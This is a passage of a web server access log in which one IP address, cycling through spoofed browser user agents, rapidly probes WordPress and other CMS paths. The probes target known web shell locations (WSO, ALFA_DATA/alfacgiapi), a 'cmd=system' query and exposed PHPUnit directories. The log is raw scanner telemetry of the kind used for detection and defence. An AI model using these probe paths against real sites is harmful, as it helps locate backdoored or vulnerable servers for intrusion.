"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:02 -0500] "GET /wp-wso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:02 -0500] "GET /wp-includes/block-bindings/radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:03 -0500] "GET /send.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:03 -0500] "GET /wp-acc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:03 -0500] "GET /wp-includes/certificates/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:26:04 -0500] "GET /.p.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:04 -0500] "GET /wp-content/1.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:04 -0500] "GET /wp-includes/SimplePie/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:06 -0500] "GET /files/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:07 -0500] "GET /assets/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:26:07 -0500] "GET /wp-includes/PHPMailer/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:07 -0500] "GET /wp-admin/user/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:26:08 -0500] "GET /wp-includes/blocks/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:26:09 -0500] "GET /assets/css/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:09 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:05 -0500] "GET /1.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:06 -0500] "GET /wp-error_log.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:06 -0500] "GET /wp-content/plugins/hello.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:26:06 -0500] "GET /wp-includes/assets/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:06 -0500] "GET /wp-content/themes/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:07 -0500] "GET /wp-includes/js/codemirror/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:07 -0500] "GET /wp-includes/theme-compat/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:08 -0500] "GET /.well-known/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:08 -0500] "GET /wp-includes/js/crop/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:08 -0500] "GET /wp-includes/html-api/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:08 -0500] "GET /wp-includes/pomo/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:09 -0500] "GET /wp-includes/customize/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:09 -0500] "GET /wp-includes/Text/Diff/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:09 -0500] "GET /wp-includes/images/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:26:10 -0500] "GET /wp-includes/Text/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:10 -0500] "GET /wp-includes/sodium_compat/src/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:10 -0500] "GET /wp-includes/css/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:11 -0500] "GET /wp-includes/block-supports/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:11 -0500] "GET /images/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:12 -0500] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:12 -0500] "GET /wp-includes/rest-api/search/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:12 -0500] "GET /admin/uploads/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:26:12 -0500] "GET /wp-includes/ID3/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:13 -0500] "GET /wp-includes/SimplePie/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:13 -0500] "GET /wp-content/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:13 -0500] "GET /wp-admin/css/colors/modern/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:14 -0500] "GET /wp-admin/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:14 -0500] "GET /wp-content/upgrade/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:15 -0500] "GET /assets/images/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:26:15 -0500] "GET /wp/wp-admin/includes/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:15 -0500] "GET /wp-includes/widgets/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:15 -0500] "GET /wp-content/up HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:16 -0500] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:16 -0500] "GET /wp-admin/css/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:16 -0500] "GET /php/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:16 -0500] "GET /wp-includes/block-bindings/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:17 -0500] "GET /wp-content/mu-plugins-old/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:17 -0500] "GET /wp-includes/fonts/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:18 -0500] "GET /wp-includes/IXR/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:26:10 -0500] "GET /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:10 -0500] "GET /wp-admin/images/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:26:11 -0500] "GET /wp-admin/maint/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:11 -0500] "GET /wp-content/plugins/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:11 -0500] "GET /wp-includes/images/crystal/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:12 -0500] "GET /wp-admin/meta/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:13 -0500] "GET /wp-content/themes/twentytwentyfour/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:26:13 -0500] "GET /private/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:14 -0500] "GET /wp-includes/Requests/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:14 -0500] "GET /wp-includes/sitemaps/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:26:14 -0500] "GET /wp-content/uploads/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:26:15 -0500] "GET /wp-includes/css/dist/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:16 -0500] "GET /wp-includes/certificates/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:26:17 -0500] "GET /plugins/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:17 -0500] "GET /modules/mod_simplefileuploadv1.3/elements/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:26:17 -0500] "GET /wp-includes/images/smilies/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:18 -0500] "GET /admin/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:18 -0500] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:18 -0500] "GET /wp-content/uploads/gravity_forms/g/f/f/b/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:18 -0500] "GET /wp-includes/Requests/library/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:19 -0500] "GET /wp-admin/network/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:26:19 -0500] "GET /wp-content/plugins/WordPressCore/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:20 -0500] "GET /upload/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:26:20 -0500] "GET /wp-includes/php-compat/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:20 -0500] "GET /wp-includes/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:21 -0500] "GET /wp-includes/rest-api/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:21 -0500] "GET /wp-includes/images/media/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:26:21 -0500] "GET /wp-includes/block-patterns/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:26:22 -0500] "GET /wp-includes/sodium_compat/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:22 -0500] "GET /wp-includes/js/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:22 -0500] "GET /wp-admin/js/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:23 -0500] "GET /wp-includes/Requests/Proxy/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:23 -0500] "GET /wp-json/wp/v2/posts?cmd=system HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:24 -0500] "GET /uploads/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:26:24 -0500] "GET /wp-includes/style-engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:24 -0500] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:26:24 -0500] "GET /vendor/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:25 -0500] "GET /wp-includes/SimplePie/Content/Type/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:25 -0500] "GET /ALFA_DATA/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:26 -0500] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:26:19 -0500] "GET /ALFA_DATA/alfacgiapi/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:19 -0500] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:19 -0500] "GET /.well-known/acme-challenge/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:20 -0500] "GET /cgi-bin/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:20 -0500] "GET /modules/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:21 -0500] "GET /sites/default/files/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:26:21 -0500] "GET /wp-includes/rest-api/endpoints/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:26:22 -0500] "GET /wp-includes/js/tinymce/plugins/compat3x/css/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:22 -0500] "GET /wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:23 -0500] "GET /wp-admin/js/widgets/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:23 -0500] "GET /wp-includes/SimplePie/Cache/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:23 -0500] "GET /wp-includes/js/swfupload/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:24 -0500] "GET /wp-includes/rest-api/fields/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:25 -0500] "GET /wp-admin/css/colors/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:25 -0500] "GET /admin/controller/extension/extension/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:25 -0500] "GET /wp-includes/Requests/Text/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:26 -0500] "GET /wp-content/uploads/2021/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:26 -0500] "GET /wp-content/plugins/classic-editor/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 